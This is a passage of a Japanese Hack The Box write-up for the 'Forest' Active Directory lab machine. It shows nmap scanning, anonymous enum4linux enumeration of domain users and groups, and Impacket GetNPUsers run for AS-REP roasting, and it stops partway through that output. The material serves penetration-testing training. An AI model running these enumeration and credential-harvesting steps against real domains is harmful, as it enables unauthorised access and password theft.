まえがき
この記事はForestのWriteupになっています 📝
葉に包まれてますね...
今回はAcriveDirectory環境でのハッキングを仕掛けていきます。
そもそも、ActiveDirectoryとはなんぞや?という人はこちらを参考に。
Machine Info
Name : Forest
IP Address : 10.10.10.161
OS : Windows 🪟
Recon
Port Scan - Nmap
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# nmap 10.10.10.161 -Pn -v -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-05 11:52 JST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:52
Completed Parallel DNS resolution of 1 host. at 11:52, 0.06s elapsed
Initiating SYN Stealth Scan at 11:52
Scanning 10.10.10.161 [1000 ports]
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Increasing send delay for 10.10.10.161 from 0 to 5 due to 230 out of 765 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 5 to 10 due to 11 out of 17 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 10 to 20 due to 11 out of 14 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 20 to 40 due to 11 out of 16 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 40 to 80 due to 11 out of 14 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 80 to 160 due to 11 out of 14 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 160 to 320 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 320 to 640 due to 11 out of 12 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 640 to 1000 due to 11 out of 12 dropped probes since last increase.
Discovered open port 464/tcp on 10.10.10.161
Completed SYN Stealth Scan at 11:55, 157.88s elapsed (1000 total ports)
Initiating Service scan at 11:55
Scanning 10 services on 10.10.10.161
Completed Service scan at 11:55, 22.31s elapsed (10 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.161
Retrying OS detection (try #2) against 10.10.10.161
Retrying OS detection (try #3) against 10.10.10.161
Retrying OS detection (try #4) against 10.10.10.161
Retrying OS detection (try #5) against 10.10.10.161
Initiating Traceroute at 11:55
Completed Traceroute at 11:55, 0.30s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:55
Completed Parallel DNS resolution of 2 hosts. at 11:55, 0.01s elapsed
NSE: Script scanning 10.10.10.161.
Initiating NSE at 11:55
Completed NSE at 11:55, 15.00s elapsed
Initiating NSE at 11:55
Completed NSE at 11:56, 8.13s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Nmap scan report for 10.10.10.161
Host is up (0.25s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-05 03:01:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/5%OT=88%CT=1%CU=34261%PV=Y%DS=2%DC=T%G=Y%TM=65976
OS:FC0%P=aarch64-unknown-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=I%CI=I%II=I%
OS:SS=S%TS=A)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST
OS:11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=200
OS:0%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T2(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.004 days (since Fri Jan 5 11:50:52 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h46m49s, deviation: 4h37m10s, median: 6m48s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-01-04T19:02:30-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-01-05T03:02:27
|_ start_date: 2024-01-05T02:57:59
TRACEROUTE (using port 1025/tcp)
HOP RTT ADDRESS
1 292.77 ms 10.10.14.1
2 292.92 ms 10.10.10.161
NSE: Script Post-scanning.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.38 seconds
ポートはたくさん開いているようだ。
88/tcp・135/tcp・139/tcp・445/tcpあたりは注視しておくべきだろう。
Windows Server 2016が動いていることやドメイン名がhtb.localであることも有益な情報だ。
Name Resolution
名前解決を行う必要がある。
/etc/hostsのファイルにこれを書き込んでおく。
10.10.10.161 htb.local
Enumeration
enum4linux
enum4linuxを使うことで、ユーザー情報の取得・共有リソースの収集・グループ情報の取得・SMBバージョンや設定の確認といった情報収集に役立つ。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# enum4linux -a -u "" -p "" 10.10.10.161
-u "" -p ""でユーザー名とパスワードを空にして、nullセッション(匿名アクセス)を試す。
実行。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# enum4linux -a -u "" -p "" 10.10.10.161
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 6 15:59:04 2024
=========================================( Target Information )=========================================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.161 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.10.161 )================================
Looking up status of 10.10.10.161
No reply from 10.10.10.161
===================================( Session Check on 10.10.10.161 )===================================
[+] Server 10.10.10.161 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.161 )================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.10.161 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.10.161 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 10.10.10.161 )=======================================
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null)Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: AdministratorDesc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda BergerDesc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
=================================( Share Enumeration on 10.10.10.161 )=================================
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.161
============================( Password Policy Information for 10.10.10.161 )============================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.161)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
=======================================( Groups on 10.10.10.161 )=======================================
[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]
[+] Getting builtin group memberships:
Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Account Operators' (RID: 548) has member: Couldn't lookup SIDs
Group: Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group: System Managed Accounts Group' (RID: 581) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs
Group: Administrators' (RID: 544) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group: 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group: 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group: 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group: 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem
Group: 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group: 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Group: 'Domain Guests' (RID: 514) has member: HTB\Guest
Group: '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Group: 'Organization Management' (RID: 1104) has member: HTB\Administrator
Group: 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group: 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group: 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group: 'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_ca8c2ed5bdab4dc9b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_75a538d3025e4db9a
Group: 'Domain Users' (RID: 513) has member: HTB\SM_681f53d4942840e18
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1b41c9286325456bb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_9b69f1b9d2cc45549
Group: 'Domain Users' (RID: 513) has member: HTB\SM_7c96b981967141ebb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_c75ee099d0a64c91b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1ffab36a2f5f479cb
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc3d7722
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfc9daad
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc0a90c9
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox670628e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox968e74d
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox6ded678
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox83d6781
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfd87238
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxb01ac64
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox7108a4e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group: 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
==================( Users on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050) )==================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
===============================( Getting printer info for 10.10.10.161 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sat Jan 6 16:09:10 2024
いい感じに情報が手に入った。
Initial Infiltration
ASREPRoasting Attack
ユーザー情報が手に入ったので、ASREPRoasting Attackをしていこう。
ASREPRoasting Attackって?
ASREPRoasting Attackは、Windows環境で使用される認証プロトコルであるKerberosを使った攻撃手法。
簡単に説明すると、「Kerberos事前認証が不要なユーザーを探す手法」
Kerberos認証プロトコルの一部のAS-REP応答というものを悪用する。
ターゲットとなるドメイン内のユーザーのAS-REP応答(ユーザーの認証情報を含み、パスワードは暗号化されていない)を手にいれる。その後、このAS-REP応答を解読してユーザーのパスワードを入手するのだ。
- 事前準備 -
ASREPRoastingをする前に、事前準備をしよう。
先ほど手に入れた、ユーザー情報からユーザーリストを作成しておく。
とりあえずぺたっと貼り付ける。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# touch users.txt
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# vi users.txt
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# cat users.txt
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
ここからユーザーネームだけ抽出しておく。新しいファイル名はUsernames.txtにした。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# grep -oP 'user:\[\K[^]]+' users.txt > Usernames.txt
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# cat Usernames.txt
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi
いいね。完成。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# GetNPUsers.py htb.local/ -usersfile Usernames.txt -no-pass -format john -outputfile hashes.txt
Impacket v0.12.0.dev1+20231114.165227.4b56c18a - Copyright 2023 Fortra
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
